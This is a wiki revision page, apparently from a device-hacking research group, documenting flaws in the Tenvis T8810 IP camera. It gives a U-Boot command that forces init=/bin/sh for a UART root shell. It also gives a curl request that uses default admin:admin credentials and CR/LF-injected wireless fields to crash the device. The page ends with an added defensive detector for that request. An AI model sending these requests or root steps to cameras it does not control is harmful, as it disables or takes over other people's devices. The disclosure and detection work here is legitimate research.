Difference between revisions of "Tenvis T8810"
0x00string (talk | contribs) (Created page with "__FORCETOC__ {{Disclaimer}} 120px|left|thumb Category:Networking =Tenvis T8810= == Purchase == Buying devices is expensive and, in a lot of ca...") |
|||
(4 intermediate revisions by 2 users not shown) | |||
Line 1: | Line 1: | ||
__FORCETOC__ | __FORCETOC__ | ||
{{Disclaimer}} | {{Disclaimer}} | ||
[[File: | [[File:TENVIS_T8110.JPG|120px|left|thumb]] | ||
[[Category:Networking]] | [[Category:Networking]] | ||
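Review bot: the image added at [[File:TENVIS_T8110.JPG|120px|left|thumb]] is named T8110, while the page title and the purchase link both say T8810. Confirm which model number is correct and rename the file or the page so the two agree.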
Line 9: | Line 9: | ||
== Purchase == | == Purchase == | ||
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device. | Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device. | ||
[https://www.amazon.com/dp/B01MFBBYO8 Purchase the Tenvis T8810 at Amazon] | [https://www.amazon.com/Indoor-Security-Camera-Baby-Monitor/dp/B01MFBBYO8/ref=cm_cd_al_qh_dp_t?tag=exploiteers-20 Purchase the Tenvis T8810 at Amazon] | ||
== | ==UART Root== | ||
The UART interface on this device is located [pictured], and runs at | The UART interface on this device is located on the main board, above the power connector [pictured], and runs at 115200, 8n1 and auto boots to a Linux kernel after a three second delay in U-Boot. A root shell can be accessed by interrupting auto boot and hijacking the init environment variable, setting it to /bin/sh, as seen below: | ||
<pre> | <pre style="white-space: pre-wrap;"> | ||
setenv bootargs console=${consoledev},${baudrate} noinitrd mem=${mem} rw ${rootfstype} init=/bin/sh ;sf probe 0 0;sf read ${loadaddr} ${sfkernel} ${filesize}; bootm | setenv bootargs console=${consoledev},${baudrate} noinitrd mem=${mem} rw ${rootfstype} init=/bin/sh ;sf probe 0 0;sf read ${loadaddr} ${sfkernel} ${filesize}; bootm | ||
</pre> | </pre> | ||
<gallery> | <gallery> | ||
TENVIS_T8110_UART.JPG | |||
</gallery> | </gallery> | ||
=== Demo === | |||
{{#ev:youtube|nxnVUVMNO5Y}} | |||
==Remote Denial of Service== | ==Remote Denial of Service== | ||
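Review bot: in the new UART Root paragraph, "hijacking the init environment variable" does not match the command shown, which sets the U-Boot bootargs variable and passes init=/bin/sh as a kernel argument inside it. Suggest rewording to say that bootargs is overridden so that init= points at /bin/sh. The gallery file TENVIS_T8110_UART.JPG also carries the T8110 name on a T8810 page.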
Line 30: | Line 33: | ||
Sending the following request will cause the device to crash, and remain in an inoperable state until recovered. | Sending the following request will cause the device to crash, and remain in an inoperable state until recovered. | ||
<pre> | <pre style="white-space: pre-wrap;"> | ||
curl 'http://192.168.1.88/cgi-bin/hi3510/param.cgi' -H 'Authorization: Basic YWRtaW46YWRtaW4=' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Connection: keep-alive' --data 'cmd=setwirelessattr&cururl=http%3A%2F%2F192.168.1.88%2Fwifi.html&-wf_ssid=%0Assidgoesheres%0D&-wf_auth=3&-wf_mode=%0Dabcdef&-wf_enc=0&-wf_enable=1&-wf_key=key12345' --compressed | curl 'http://192.168.1.88/cgi-bin/hi3510/param.cgi' -H 'Authorization: Basic YWRtaW46YWRtaW4=' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Connection: keep-alive' --data 'cmd=setwirelessattr&cururl=http%3A%2F%2F192.168.1.88%2Fwifi.html&-wf_ssid=%0Assidgoesheres%0D&-wf_auth=3&-wf_mode=%0Dabcdef&-wf_enc=0&-wf_enable=1&-wf_key=key12345' --compressed | ||
<pre> | <pre> |
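Review bot: the block holding the curl request is terminated with an opening <pre> instead of </pre> in both revisions, so the preformatted block is never closed and anything added after it will render inside it. Change the last line of the hunk to </pre>, as the UART block above does.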
Latest revision as of 01:08, 11 August 2017
"Although the information we release has been verified and shown to work to the best of our knowledge, we can't be held accountable for bricked devices or roots gone wrong."
Tenvis T8810
Purchase
Buying devices is expensive and, in a lot of cases, our testing leads to bricked equipment. If you would like to help support our group, site, and research, please use one of the links below to purchase your next device.
Purchase the Tenvis T8810 at Amazon
UART Root
The UART interface on this device is located on the main board, above the power connector [pictured]. It runs at 115200 baud, 8n1, and U-Boot auto-boots a Linux kernel after a three-second delay. A root shell can be accessed by interrupting autoboot and overriding the init parameter in the bootargs environment variable, setting it to /bin/sh, as seen below:
setenv bootargs console=${consoledev},${baudrate} noinitrd mem=${mem} rw ${rootfstype} init=/bin/sh ;sf probe 0 0;sf read ${loadaddr} ${sfkernel} ${filesize}; bootm
Demo
Remote Denial of Service
WARNING
This will leave your device in an unusable state until recovered via UART. Proceed at your own peril.
Sending the following request will cause the device to crash and remain in an inoperable state until recovered.
curl 'http://192.168.1.88/cgi-bin/hi3510/param.cgi' -H 'Authorization: Basic YWRtaW46YWRtaW4=' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Connection: keep-alive' --data 'cmd=setwirelessattr&cururl=http%3A%2F%2F192.168.1.88%2Fwifi.html&-wf_ssid=%0Assidgoesheres%0D&-wf_auth=3&-wf_mode=%0Dabcdef&-wf_enc=0&-wf_enable=1&-wf_key=key12345' --compressed
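A defensive check for the request above, as an added example that is not part of the original page: it parses a form-encoded body sent to param.cgi and flags setwirelessattr parameters that carry control characters, such as the encoded CR/LF bytes visible in -wf_ssid and -wf_mode. That those bytes are what triggers the crash is an assumption (the page does not state the root cause), and the function names and sample bodies are constructed for illustration.

```python
from urllib.parse import parse_qsl

# Parameters of the setwirelessattr command seen in the request on this page.
WIRELESS_FIELDS = {"-wf_ssid", "-wf_mode", "-wf_auth", "-wf_enc", "-wf_enable", "-wf_key"}
MAX_SSID_BYTES = 32  # 802.11 SSID length limit


def control_chars(value):
    """Return the sorted ASCII control characters present in a decoded value."""
    return sorted({c for c in value if ord(c) < 0x20 or ord(c) == 0x7F})


def inspect_param_cgi_body(body):
    """Return (field, reason) findings for a form-encoded POST body.

    An empty list means the body passed the checks.
    """
    findings = []
    fields = parse_qsl(body, keep_blank_values=True)  # percent-decodes values
    if dict(fields).get("cmd", "") != "setwirelessattr":
        return findings  # only this command is covered here
    for name, value in fields:
        if name not in WIRELESS_FIELDS:
            continue
        bad = control_chars(value)
        if bad:
            listed = ", ".join(repr(c) for c in bad)
            findings.append((name, "control characters: " + listed))
        if name == "-wf_ssid" and len(value.encode("utf-8")) > MAX_SSID_BYTES:
            findings.append((name, "SSID longer than 32 bytes"))
    return findings


# Constructed sample bodies: the first mirrors the shape of the request above,
# the second is an ordinary configuration change.
SAMPLE_FLAGGED = ("cmd=setwirelessattr&-wf_ssid=%0Assidgoesheres%0D&-wf_auth=3"
                  "&-wf_mode=%0Dabcdef&-wf_enc=0&-wf_enable=1&-wf_key=key12345")
SAMPLE_CLEAN = ("cmd=setwirelessattr&-wf_ssid=HomeNet&-wf_auth=3"
                "&-wf_mode=0&-wf_enc=0&-wf_enable=1&-wf_key=key12345")

if __name__ == "__main__":
    for label, body in (("flagged", SAMPLE_FLAGGED), ("clean", SAMPLE_CLEAN)):
        print(label, inspect_param_cgi_body(body))
```

The same function can sit in a reverse proxy in front of the camera's web interface or be run over captured request bodies during incident review.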